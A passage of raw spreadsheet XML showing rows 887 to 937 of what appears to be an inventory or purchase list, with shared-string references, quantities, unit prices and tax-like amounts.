        <v>7012</v>
      </c>
      <c r="D887" s="238" t="s">
        <v>7013</v>
      </c>
      <c r="E887" s="238" t="s">
        <v>7009</v>
      </c>
      <c r="F887" s="238" t="s">
        <v>3852</v>
      </c>
      <c r="G887" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H887" s="10">
        <v>200</v>
      </c>
      <c r="I887" s="14">
        <v>17.77</v>
      </c>
      <c r="J887" s="15">
        <v>2.88</v>
      </c>
      <c r="K887" s="16"/>
    </row>
    <row r="888" spans="2:11">
      <c r="B888" s="9">
        <v>916</v>
      </c>
      <c r="C888" s="238" t="s">
        <v>7014</v>
      </c>
      <c r="D888" s="238" t="s">
        <v>7015</v>
      </c>
      <c r="E888" s="238" t="s">
        <v>7016</v>
      </c>
      <c r="F888" s="238" t="s">
        <v>6273</v>
      </c>
      <c r="G888" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H888" s="10">
        <v>153</v>
      </c>
      <c r="I888" s="14">
        <v>26.38</v>
      </c>
      <c r="J888" s="15">
        <v>4.1616</v>
      </c>
      <c r="K888" s="16"/>
    </row>
    <row r="889" spans="2:11">
      <c r="B889" s="9">
        <v>917</v>
      </c>
      <c r="C889" s="238" t="s">
        <v>7017</v>
      </c>
      <c r="D889" s="238" t="s">
        <v>7018</v>
      </c>
      <c r="E889" s="238" t="s">
        <v>7019</v>
      </c>
      <c r="F889" s="9"/>
      <c r="G889" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H889" s="10">
        <v>20</v>
      </c>
      <c r="I889" s="14">
        <v>56.31</v>
      </c>
      <c r="J889" s="15">
        <v>9.024</v>
      </c>
      <c r="K889" s="16"/>
    </row>
    <row r="890" spans="2:11">
      <c r="B890" s="9">
        <v>918</v>
      </c>
      <c r="C890" s="238" t="s">
        <v>7020</v>
      </c>
      <c r="D890" s="238" t="s">
        <v>7021</v>
      </c>
      <c r="E890" s="238" t="s">
        <v>7022</v>
      </c>
      <c r="F890" s="9"/>
      <c r="G890" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H890" s="10">
        <v>13</v>
      </c>
      <c r="I890" s="14">
        <v>2259.19</v>
      </c>
      <c r="J890" s="15">
        <v>361.4624</v>
      </c>
      <c r="K890" s="16"/>
    </row>
    <row r="891" spans="2:11">
      <c r="B891" s="9">
        <v>919</v>
      </c>
      <c r="C891" s="238" t="s">
        <v>7023</v>
      </c>
      <c r="D891" s="238" t="s">
        <v>6979</v>
      </c>
      <c r="E891" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F891" s="9"/>
      <c r="G891" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H891" s="10">
        <v>842</v>
      </c>
      <c r="I891" s="14">
        <v>1726.22</v>
      </c>
      <c r="J891" s="15">
        <v>690.44</v>
      </c>
      <c r="K891" s="16"/>
    </row>
    <row r="892" spans="2:11">
      <c r="B892" s="9">
        <v>920</v>
      </c>
      <c r="C892" s="238" t="s">
        <v>7024</v>
      </c>
      <c r="D892" s="238" t="s">
        <v>7025</v>
      </c>
      <c r="E892" s="238" t="s">
        <v>7026</v>
      </c>
      <c r="F892" s="9"/>
      <c r="G892" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H892" s="10">
        <v>18</v>
      </c>
      <c r="I892" s="14">
        <v>476.9</v>
      </c>
      <c r="J892" s="15">
        <v>76.288</v>
      </c>
      <c r="K892" s="16"/>
    </row>
    <row r="893" spans="2:11">
      <c r="B893" s="9">
        <v>921</v>
      </c>
      <c r="C893" s="238" t="s">
        <v>7027</v>
      </c>
      <c r="D893" s="238" t="s">
        <v>7028</v>
      </c>
      <c r="E893" s="238" t="s">
        <v>7029</v>
      </c>
      <c r="F893" s="9"/>
      <c r="G893" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H893" s="10">
        <v>11</v>
      </c>
      <c r="I893" s="14">
        <v>197.98</v>
      </c>
      <c r="J893" s="15">
        <v>31.68</v>
      </c>
      <c r="K893" s="16"/>
    </row>
    <row r="894" spans="2:11">
      <c r="B894" s="9">
        <v>922</v>
      </c>
      <c r="C894" s="238" t="s">
        <v>7030</v>
      </c>
      <c r="D894" s="238" t="s">
        <v>7031</v>
      </c>
      <c r="E894" s="238" t="s">
        <v>7032</v>
      </c>
      <c r="F894" s="9"/>
      <c r="G894" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H894" s="10">
        <v>34</v>
      </c>
      <c r="I894" s="14">
        <v>358.51</v>
      </c>
      <c r="J894" s="15">
        <v>57.336</v>
      </c>
      <c r="K894" s="16"/>
    </row>
    <row r="895" spans="2:11">
      <c r="B895" s="9">
        <v>923</v>
      </c>
      <c r="C895" s="238" t="s">
        <v>7033</v>
      </c>
      <c r="D895" s="238" t="s">
        <v>7034</v>
      </c>
      <c r="E895" s="238" t="s">
        <v>7035</v>
      </c>
      <c r="F895" s="238" t="s">
        <v>7036</v>
      </c>
      <c r="G895" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H895" s="10">
        <v>19</v>
      </c>
      <c r="I895" s="14">
        <v>127.2</v>
      </c>
      <c r="J895" s="15">
        <v>20.336</v>
      </c>
      <c r="K895" s="16"/>
    </row>
    <row r="896" spans="2:11">
      <c r="B896" s="9">
        <v>924</v>
      </c>
      <c r="C896" s="238" t="s">
        <v>7037</v>
      </c>
      <c r="D896" s="238" t="s">
        <v>7038</v>
      </c>
      <c r="E896" s="238" t="s">
        <v>7039</v>
      </c>
      <c r="F896" s="9"/>
      <c r="G896" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H896" s="10">
        <v>3</v>
      </c>
      <c r="I896" s="14">
        <v>277.65</v>
      </c>
      <c r="J896" s="15">
        <v>44.424</v>
      </c>
      <c r="K896" s="16"/>
    </row>
    <row r="897" spans="2:11">
      <c r="B897" s="9">
        <v>925</v>
      </c>
      <c r="C897" s="238" t="s">
        <v>7040</v>
      </c>
      <c r="D897" s="238" t="s">
        <v>7041</v>
      </c>
      <c r="E897" s="238" t="s">
        <v>7041</v>
      </c>
      <c r="F897" s="9"/>
      <c r="G897" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H897" s="10">
        <v>10</v>
      </c>
      <c r="I897" s="14">
        <v>42.74</v>
      </c>
      <c r="J897" s="15">
        <v>6.832</v>
      </c>
      <c r="K897" s="16"/>
    </row>
    <row r="898" spans="2:11">
      <c r="B898" s="9">
        <v>926</v>
      </c>
      <c r="C898" s="238" t="s">
        <v>7042</v>
      </c>
      <c r="D898" s="238" t="s">
        <v>7043</v>
      </c>
      <c r="E898" s="238" t="s">
        <v>7044</v>
      </c>
      <c r="F898" s="9"/>
      <c r="G898" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H898" s="10">
        <v>10</v>
      </c>
      <c r="I898" s="14">
        <v>102.56</v>
      </c>
      <c r="J898" s="15">
        <v>16.416</v>
      </c>
      <c r="K898" s="16"/>
    </row>
    <row r="899" spans="2:11">
      <c r="B899" s="9">
        <v>927</v>
      </c>
      <c r="C899" s="238" t="s">
        <v>7045</v>
      </c>
      <c r="D899" s="238" t="s">
        <v>7046</v>
      </c>
      <c r="E899" s="238" t="s">
        <v>7047</v>
      </c>
      <c r="F899" s="9"/>
      <c r="G899" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H899" s="10">
        <v>54</v>
      </c>
      <c r="I899" s="14">
        <v>64.28</v>
      </c>
      <c r="J899" s="15">
        <v>10.28</v>
      </c>
      <c r="K899" s="16"/>
    </row>
    <row r="900" spans="2:11">
      <c r="B900" s="9">
        <v>928</v>
      </c>
      <c r="C900" s="238" t="s">
        <v>7048</v>
      </c>
      <c r="D900" s="238" t="s">
        <v>5471</v>
      </c>
      <c r="E900" s="238" t="s">
        <v>7049</v>
      </c>
      <c r="F900" s="9"/>
      <c r="G900" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H900" s="10">
        <v>8</v>
      </c>
      <c r="I900" s="14">
        <v>16</v>
      </c>
      <c r="J900" s="15">
        <v>2.56</v>
      </c>
      <c r="K900" s="16"/>
    </row>
    <row r="901" spans="2:11">
      <c r="B901" s="9">
        <v>929</v>
      </c>
      <c r="C901" s="238" t="s">
        <v>7050</v>
      </c>
      <c r="D901" s="238" t="s">
        <v>5536</v>
      </c>
      <c r="E901" s="238" t="s">
        <v>7051</v>
      </c>
      <c r="F901" s="9"/>
      <c r="G901" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H901" s="10">
        <v>9</v>
      </c>
      <c r="I901" s="14">
        <v>20.8</v>
      </c>
      <c r="J901" s="15">
        <v>3.328</v>
      </c>
      <c r="K901" s="16"/>
    </row>
    <row r="902" spans="2:11">
      <c r="B902" s="9">
        <v>930</v>
      </c>
      <c r="C902" s="238" t="s">
        <v>7052</v>
      </c>
      <c r="D902" s="238" t="s">
        <v>7053</v>
      </c>
      <c r="E902" s="238" t="s">
        <v>7054</v>
      </c>
      <c r="F902" s="238" t="s">
        <v>7055</v>
      </c>
      <c r="G902" s="237" t="s">
        <v>5852</v>
      </c>
      <c r="H902" s="10">
        <v>1</v>
      </c>
      <c r="I902" s="14">
        <v>19.84</v>
      </c>
      <c r="J902" s="15">
        <v>3.176</v>
      </c>
      <c r="K902" s="16"/>
    </row>
    <row r="903" spans="2:11">
      <c r="B903" s="9">
        <v>931</v>
      </c>
      <c r="C903" s="238" t="s">
        <v>7056</v>
      </c>
      <c r="D903" s="238" t="s">
        <v>7057</v>
      </c>
      <c r="E903" s="238" t="s">
        <v>7058</v>
      </c>
      <c r="F903" s="9"/>
      <c r="G903" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H903" s="10">
        <v>1</v>
      </c>
      <c r="I903" s="14">
        <v>1367.52</v>
      </c>
      <c r="J903" s="15">
        <v>218.8</v>
      </c>
      <c r="K903" s="16"/>
    </row>
    <row r="904" spans="2:11">
      <c r="B904" s="9">
        <v>932</v>
      </c>
      <c r="C904" s="238" t="s">
        <v>7059</v>
      </c>
      <c r="D904" s="238" t="s">
        <v>7060</v>
      </c>
      <c r="E904" s="238" t="s">
        <v>7061</v>
      </c>
      <c r="F904" s="9"/>
      <c r="G904" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H904" s="10">
        <v>39</v>
      </c>
      <c r="I904" s="14">
        <v>1128.03</v>
      </c>
      <c r="J904" s="15">
        <v>180.464</v>
      </c>
      <c r="K904" s="16"/>
    </row>
    <row r="905" spans="2:11">
      <c r="B905" s="9">
        <v>933</v>
      </c>
      <c r="C905" s="238" t="s">
        <v>7062</v>
      </c>
      <c r="D905" s="238" t="s">
        <v>7063</v>
      </c>
      <c r="E905" s="238" t="s">
        <v>7064</v>
      </c>
      <c r="F905" s="238" t="s">
        <v>7065</v>
      </c>
      <c r="G905" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H905" s="10">
        <v>126</v>
      </c>
      <c r="I905" s="14">
        <v>2077.69</v>
      </c>
      <c r="J905" s="15">
        <v>332.44</v>
      </c>
      <c r="K905" s="16"/>
    </row>
    <row r="906" spans="2:11">
      <c r="B906" s="9">
        <v>934</v>
      </c>
      <c r="C906" s="238" t="s">
        <v>7066</v>
      </c>
      <c r="D906" s="238" t="s">
        <v>7067</v>
      </c>
      <c r="E906" s="238" t="s">
        <v>7068</v>
      </c>
      <c r="F906" s="238" t="s">
        <v>7069</v>
      </c>
      <c r="G906" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H906" s="10">
        <v>7</v>
      </c>
      <c r="I906" s="14">
        <v>86.28</v>
      </c>
      <c r="J906" s="15">
        <v>13.808</v>
      </c>
      <c r="K906" s="16"/>
    </row>
    <row r="907" spans="2:11">
      <c r="B907" s="9">
        <v>935</v>
      </c>
      <c r="C907" s="238" t="s">
        <v>7070</v>
      </c>
      <c r="D907" s="238" t="s">
        <v>7071</v>
      </c>
      <c r="E907" s="238" t="s">
        <v>7072</v>
      </c>
      <c r="F907" s="9"/>
      <c r="G907" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H907" s="10">
        <v>2</v>
      </c>
      <c r="I907" s="14">
        <v>7.01</v>
      </c>
      <c r="J907" s="15">
        <v>1.12</v>
      </c>
      <c r="K907" s="16"/>
    </row>
    <row r="908" spans="2:11">
      <c r="B908" s="9">
        <v>936</v>
      </c>
      <c r="C908" s="238" t="s">
        <v>7073</v>
      </c>
      <c r="D908" s="238" t="s">
        <v>7074</v>
      </c>
      <c r="E908" s="238" t="s">
        <v>7075</v>
      </c>
      <c r="F908" s="238" t="s">
        <v>7076</v>
      </c>
      <c r="G908" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H908" s="10">
        <v>5</v>
      </c>
      <c r="I908" s="14">
        <v>11.11</v>
      </c>
      <c r="J908" s="15">
        <v>1.776</v>
      </c>
      <c r="K908" s="16"/>
    </row>
    <row r="909" spans="2:11">
      <c r="B909" s="9">
        <v>937</v>
      </c>
      <c r="C909" s="238" t="s">
        <v>7077</v>
      </c>
      <c r="D909" s="238" t="s">
        <v>7074</v>
      </c>
      <c r="E909" s="238" t="s">
        <v>7075</v>
      </c>
      <c r="F909" s="238" t="s">
        <v>5904</v>
      </c>
      <c r="G909" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H909" s="10">
        <v>2</v>
      </c>
      <c r="I909" s="14">
        <v>8.07</v>
      </c>
      <c r="J909" s="15">
        <v>1.296</v>
      </c>
      <c r="K909" s="16"/>
    </row>
    <row r="910" spans="2:11">
      <c r="B910" s="9">
        <v>938</v>
      </c>
      <c r="C910" s="238" t="s">
        <v>7078</v>
      </c>
      <c r="D910" s="238" t="s">
        <v>7079</v>
      </c>
      <c r="E910" s="238" t="s">
        <v>7080</v>
      </c>
      <c r="F910" s="238" t="s">
        <v>7069</v>
      </c>
      <c r="G910" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H910" s="10">
        <v>3</v>
      </c>
      <c r="I910" s="14">
        <v>53.85</v>
      </c>
      <c r="J910" s="15">
        <v>8.616</v>
      </c>
      <c r="K910" s="16"/>
    </row>
    <row r="911" spans="2:11">
      <c r="B911" s="9">
        <v>939</v>
      </c>
      <c r="C911" s="238" t="s">
        <v>7081</v>
      </c>
      <c r="D911" s="238" t="s">
        <v>7082</v>
      </c>
      <c r="E911" s="238" t="s">
        <v>7083</v>
      </c>
      <c r="F911" s="238" t="s">
        <v>7084</v>
      </c>
      <c r="G911" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H911" s="10">
        <v>1</v>
      </c>
      <c r="I911" s="14">
        <v>10.18</v>
      </c>
      <c r="J911" s="15">
        <v>1.6288</v>
      </c>
      <c r="K911" s="16"/>
    </row>
    <row r="912" spans="2:11">
      <c r="B912" s="9">
        <v>940</v>
      </c>
      <c r="C912" s="238" t="s">
        <v>7085</v>
      </c>
      <c r="D912" s="238" t="s">
        <v>7086</v>
      </c>
      <c r="E912" s="238" t="s">
        <v>7087</v>
      </c>
      <c r="F912" s="238" t="s">
        <v>7088</v>
      </c>
      <c r="G912" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H912" s="10">
        <v>8</v>
      </c>
      <c r="I912" s="14">
        <v>166.4</v>
      </c>
      <c r="J912" s="15">
        <v>26.624</v>
      </c>
      <c r="K912" s="16"/>
    </row>
    <row r="913" spans="2:11">
      <c r="B913" s="9">
        <v>941</v>
      </c>
      <c r="C913" s="238" t="s">
        <v>7089</v>
      </c>
      <c r="D913" s="238" t="s">
        <v>7090</v>
      </c>
      <c r="E913" s="238" t="s">
        <v>7091</v>
      </c>
      <c r="F913" s="9"/>
      <c r="G913" s="237" t="s">
        <v>6923</v>
      </c>
      <c r="H913" s="10">
        <v>200</v>
      </c>
      <c r="I913" s="14">
        <v>375.64</v>
      </c>
      <c r="J913" s="15">
        <v>60.16</v>
      </c>
      <c r="K913" s="16"/>
    </row>
    <row r="914" spans="2:11">
      <c r="B914" s="9">
        <v>942</v>
      </c>
      <c r="C914" s="238" t="s">
        <v>7092</v>
      </c>
      <c r="D914" s="238" t="s">
        <v>7093</v>
      </c>
      <c r="E914" s="238" t="s">
        <v>7094</v>
      </c>
      <c r="F914" s="9"/>
      <c r="G914" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H914" s="10">
        <v>8</v>
      </c>
      <c r="I914" s="14">
        <v>57.5</v>
      </c>
      <c r="J914" s="15">
        <v>9.2032</v>
      </c>
      <c r="K914" s="16"/>
    </row>
    <row r="915" spans="2:11">
      <c r="B915" s="9">
        <v>943</v>
      </c>
      <c r="C915" s="238" t="s">
        <v>7095</v>
      </c>
      <c r="D915" s="238" t="s">
        <v>7096</v>
      </c>
      <c r="E915" s="238" t="s">
        <v>7097</v>
      </c>
      <c r="F915" s="9"/>
      <c r="G915" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H915" s="10">
        <v>5</v>
      </c>
      <c r="I915" s="14">
        <v>273.51</v>
      </c>
      <c r="J915" s="15">
        <v>43.76</v>
      </c>
      <c r="K915" s="16"/>
    </row>
    <row r="916" spans="2:11">
      <c r="B916" s="9">
        <v>944</v>
      </c>
      <c r="C916" s="238" t="s">
        <v>7098</v>
      </c>
      <c r="D916" s="238" t="s">
        <v>7099</v>
      </c>
      <c r="E916" s="238" t="s">
        <v>3238</v>
      </c>
      <c r="F916" s="9"/>
      <c r="G916" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H916" s="10">
        <v>10</v>
      </c>
      <c r="I916" s="14">
        <v>102.56</v>
      </c>
      <c r="J916" s="15">
        <v>16.416</v>
      </c>
      <c r="K916" s="16"/>
    </row>
    <row r="917" spans="2:11">
      <c r="B917" s="9">
        <v>945</v>
      </c>
      <c r="C917" s="238" t="s">
        <v>7100</v>
      </c>
      <c r="D917" s="238" t="s">
        <v>7101</v>
      </c>
      <c r="E917" s="238" t="s">
        <v>7102</v>
      </c>
      <c r="F917" s="238" t="s">
        <v>7084</v>
      </c>
      <c r="G917" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H917" s="10">
        <v>4</v>
      </c>
      <c r="I917" s="14">
        <v>24</v>
      </c>
      <c r="J917" s="15">
        <v>3.84</v>
      </c>
      <c r="K917" s="16"/>
    </row>
    <row r="918" spans="2:11">
      <c r="B918" s="9">
        <v>946</v>
      </c>
      <c r="C918" s="238" t="s">
        <v>7103</v>
      </c>
      <c r="D918" s="238" t="s">
        <v>7104</v>
      </c>
      <c r="E918" s="238" t="s">
        <v>7105</v>
      </c>
      <c r="F918" s="238" t="s">
        <v>7106</v>
      </c>
      <c r="G918" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H918" s="10">
        <v>9</v>
      </c>
      <c r="I918" s="14">
        <v>78.99</v>
      </c>
      <c r="J918" s="15">
        <v>12.6432</v>
      </c>
      <c r="K918" s="16"/>
    </row>
    <row r="919" spans="2:11">
      <c r="B919" s="9">
        <v>947</v>
      </c>
      <c r="C919" s="238" t="s">
        <v>7107</v>
      </c>
      <c r="D919" s="238" t="s">
        <v>7104</v>
      </c>
      <c r="E919" s="238" t="s">
        <v>7105</v>
      </c>
      <c r="F919" s="238" t="s">
        <v>7108</v>
      </c>
      <c r="G919" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H919" s="10">
        <v>5</v>
      </c>
      <c r="I919" s="14">
        <v>34.6</v>
      </c>
      <c r="J919" s="15">
        <v>5.536</v>
      </c>
      <c r="K919" s="16"/>
    </row>
    <row r="920" spans="2:11">
      <c r="B920" s="9">
        <v>948</v>
      </c>
      <c r="C920" s="238" t="s">
        <v>7109</v>
      </c>
      <c r="D920" s="238" t="s">
        <v>7104</v>
      </c>
      <c r="E920" s="238" t="s">
        <v>7105</v>
      </c>
      <c r="F920" s="238" t="s">
        <v>7110</v>
      </c>
      <c r="G920" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H920" s="10">
        <v>5</v>
      </c>
      <c r="I920" s="14">
        <v>14.06</v>
      </c>
      <c r="J920" s="15">
        <v>2.248</v>
      </c>
      <c r="K920" s="16"/>
    </row>
    <row r="921" spans="2:11">
      <c r="B921" s="9">
        <v>949</v>
      </c>
      <c r="C921" s="238" t="s">
        <v>7111</v>
      </c>
      <c r="D921" s="238" t="s">
        <v>7112</v>
      </c>
      <c r="E921" s="238" t="s">
        <v>7113</v>
      </c>
      <c r="F921" s="9"/>
      <c r="G921" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H921" s="10">
        <v>1</v>
      </c>
      <c r="I921" s="14">
        <v>2735.04</v>
      </c>
      <c r="J921" s="15">
        <v>437.6064</v>
      </c>
      <c r="K921" s="16"/>
    </row>
    <row r="922" spans="2:11">
      <c r="B922" s="9">
        <v>950</v>
      </c>
      <c r="C922" s="238" t="s">
        <v>7114</v>
      </c>
      <c r="D922" s="238" t="s">
        <v>7101</v>
      </c>
      <c r="E922" s="238" t="s">
        <v>7115</v>
      </c>
      <c r="F922" s="238" t="s">
        <v>5904</v>
      </c>
      <c r="G922" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H922" s="10">
        <v>10</v>
      </c>
      <c r="I922" s="14">
        <v>29.06</v>
      </c>
      <c r="J922" s="15">
        <v>4.656</v>
      </c>
      <c r="K922" s="16"/>
    </row>
    <row r="923" spans="2:11">
      <c r="B923" s="9">
        <v>951</v>
      </c>
      <c r="C923" s="238" t="s">
        <v>7116</v>
      </c>
      <c r="D923" s="238" t="s">
        <v>7117</v>
      </c>
      <c r="E923" s="238" t="s">
        <v>7118</v>
      </c>
      <c r="F923" s="238" t="s">
        <v>4690</v>
      </c>
      <c r="G923" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H923" s="10">
        <v>9</v>
      </c>
      <c r="I923" s="14">
        <v>200</v>
      </c>
      <c r="J923" s="15">
        <v>31.9968</v>
      </c>
      <c r="K923" s="16"/>
    </row>
    <row r="924" spans="2:11">
      <c r="B924" s="9">
        <v>952</v>
      </c>
      <c r="C924" s="238" t="s">
        <v>7119</v>
      </c>
      <c r="D924" s="238" t="s">
        <v>7117</v>
      </c>
      <c r="E924" s="238" t="s">
        <v>7118</v>
      </c>
      <c r="F924" s="238" t="s">
        <v>7120</v>
      </c>
      <c r="G924" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H924" s="10">
        <v>9</v>
      </c>
      <c r="I924" s="14">
        <v>230.77</v>
      </c>
      <c r="J924" s="15">
        <v>36.9216</v>
      </c>
      <c r="K924" s="16"/>
    </row>
    <row r="925" spans="2:11">
      <c r="B925" s="9">
        <v>953</v>
      </c>
      <c r="C925" s="238" t="s">
        <v>7121</v>
      </c>
      <c r="D925" s="238" t="s">
        <v>7122</v>
      </c>
      <c r="E925" s="238" t="s">
        <v>7123</v>
      </c>
      <c r="F925" s="238" t="s">
        <v>7124</v>
      </c>
      <c r="G925" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H925" s="10">
        <v>10</v>
      </c>
      <c r="I925" s="14">
        <v>102.56</v>
      </c>
      <c r="J925" s="15">
        <v>16.416</v>
      </c>
      <c r="K925" s="16"/>
    </row>
    <row r="926" spans="2:11">
      <c r="B926" s="9">
        <v>954</v>
      </c>
      <c r="C926" s="238" t="s">
        <v>7125</v>
      </c>
      <c r="D926" s="238" t="s">
        <v>7126</v>
      </c>
      <c r="E926" s="238" t="s">
        <v>7127</v>
      </c>
      <c r="F926" s="9"/>
      <c r="G926" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H926" s="10">
        <v>5</v>
      </c>
      <c r="I926" s="14">
        <v>2020.44</v>
      </c>
      <c r="J926" s="15">
        <v>323.272</v>
      </c>
      <c r="K926" s="16"/>
    </row>
    <row r="927" spans="2:11">
      <c r="B927" s="9">
        <v>955</v>
      </c>
      <c r="C927" s="238" t="s">
        <v>7128</v>
      </c>
      <c r="D927" s="238" t="s">
        <v>7129</v>
      </c>
      <c r="E927" s="238" t="s">
        <v>7130</v>
      </c>
      <c r="F927" s="9"/>
      <c r="G927" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H927" s="10">
        <v>3</v>
      </c>
      <c r="I927" s="14">
        <v>200.3</v>
      </c>
      <c r="J927" s="15">
        <v>32.0496</v>
      </c>
      <c r="K927" s="16"/>
    </row>
    <row r="928" spans="2:11">
      <c r="B928" s="9">
        <v>956</v>
      </c>
      <c r="C928" s="238" t="s">
        <v>7131</v>
      </c>
      <c r="D928" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="E928" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F928" s="238" t="s">
        <v>7132</v>
      </c>
      <c r="G928" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H928" s="10">
        <v>2</v>
      </c>
      <c r="I928" s="14">
        <v>1360</v>
      </c>
      <c r="J928" s="15">
        <v>217.6</v>
      </c>
      <c r="K928" s="16"/>
    </row>
    <row r="929" spans="2:11">
      <c r="B929" s="9">
        <v>957</v>
      </c>
      <c r="C929" s="238" t="s">
        <v>7133</v>
      </c>
      <c r="D929" s="238" t="s">
        <v>6795</v>
      </c>
      <c r="E929" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F929" s="9"/>
      <c r="G929" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H929" s="10">
        <v>2</v>
      </c>
      <c r="I929" s="14">
        <v>562.4</v>
      </c>
      <c r="J929" s="15">
        <v>89.984</v>
      </c>
      <c r="K929" s="16"/>
    </row>
    <row r="930" spans="2:11">
      <c r="B930" s="9">
        <v>958</v>
      </c>
      <c r="C930" s="238" t="s">
        <v>7134</v>
      </c>
      <c r="D930" s="238" t="s">
        <v>7135</v>
      </c>
      <c r="E930" s="238" t="s">
        <v>7136</v>
      </c>
      <c r="F930" s="9"/>
      <c r="G930" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H930" s="10">
        <v>1</v>
      </c>
      <c r="I930" s="14">
        <v>1430</v>
      </c>
      <c r="J930" s="15">
        <v>228.8</v>
      </c>
      <c r="K930" s="16"/>
    </row>
    <row r="931" spans="2:11">
      <c r="B931" s="9">
        <v>959</v>
      </c>
      <c r="C931" s="238" t="s">
        <v>7137</v>
      </c>
      <c r="D931" s="238" t="s">
        <v>7138</v>
      </c>
      <c r="E931" s="238" t="s">
        <v>7139</v>
      </c>
      <c r="F931" s="9"/>
      <c r="G931" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H931" s="10">
        <v>4</v>
      </c>
      <c r="I931" s="14">
        <v>95.67</v>
      </c>
      <c r="J931" s="15">
        <v>15.3088</v>
      </c>
      <c r="K931" s="16"/>
    </row>
    <row r="932" spans="2:11">
      <c r="B932" s="9">
        <v>960</v>
      </c>
      <c r="C932" s="238" t="s">
        <v>7140</v>
      </c>
      <c r="D932" s="238" t="s">
        <v>7141</v>
      </c>
      <c r="E932" s="238" t="s">
        <v>7142</v>
      </c>
      <c r="F932" s="9"/>
      <c r="G932" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H932" s="10">
        <v>1</v>
      </c>
      <c r="I932" s="14">
        <v>266.25</v>
      </c>
      <c r="J932" s="15">
        <v>42.6</v>
      </c>
      <c r="K932" s="16"/>
    </row>
    <row r="933" spans="2:11">
      <c r="B933" s="9">
        <v>961</v>
      </c>
      <c r="C933" s="238" t="s">
        <v>7143</v>
      </c>
      <c r="D933" s="238" t="s">
        <v>7079</v>
      </c>
      <c r="E933" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F933" s="238" t="s">
        <v>7144</v>
      </c>
      <c r="G933" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H933" s="10">
        <v>2</v>
      </c>
      <c r="I933" s="14">
        <v>2100</v>
      </c>
      <c r="J933" s="15">
        <v>336</v>
      </c>
      <c r="K933" s="16"/>
    </row>
    <row r="934" spans="2:11">
      <c r="B934" s="9">
        <v>962</v>
      </c>
      <c r="C934" s="238" t="s">
        <v>7145</v>
      </c>
      <c r="D934" s="238" t="s">
        <v>7079</v>
      </c>
      <c r="E934" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F934" s="238" t="s">
        <v>7146</v>
      </c>
      <c r="G934" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H934" s="10">
        <v>1</v>
      </c>
      <c r="I934" s="14">
        <v>837.6</v>
      </c>
      <c r="J934" s="15">
        <v>134.016</v>
      </c>
      <c r="K934" s="16"/>
    </row>
    <row r="935" spans="2:11">
      <c r="B935" s="9">
        <v>963</v>
      </c>
      <c r="C935" s="238" t="s">
        <v>7147</v>
      </c>
      <c r="D935" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="E935" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F935" s="238" t="s">
        <v>7148</v>
      </c>
      <c r="G935" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H935" s="10">
        <v>2</v>
      </c>
      <c r="I935" s="14">
        <v>1160</v>
      </c>
      <c r="J935" s="15">
        <v>185.6</v>
      </c>
      <c r="K935" s="16"/>
    </row>
    <row r="936" spans="2:11">
      <c r="B936" s="9">
        <v>964</v>
      </c>
      <c r="C936" s="238" t="s">
        <v>7149</v>
      </c>
      <c r="D936" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="E936" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F936" s="238" t="s">
        <v>7150</v>
      </c>
      <c r="G936" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H936" s="10">
        <v>2</v>
      </c>
      <c r="I936" s="14">
        <v>580</v>
      </c>
      <c r="J936" s="15">
        <v>92.8</v>
      </c>
      <c r="K936" s="16"/>
    </row>
    <row r="937" spans="2:11">
      <c r="B937" s="9">
        <v>965</v>
      </c>
      <c r="C937" s="238" t="s">
        <v>7151</v>
      </c>
      <c r="D937" s="238" t="s">
        <v>7152</v>
      </c>
      <c r="E937" s="238" t="s">
        <v>7153</v>
      </c>
      <c r="F937" s="9"/>
      <c r="G937" s="237" t="s">
        <v>5137</v>
      </c>
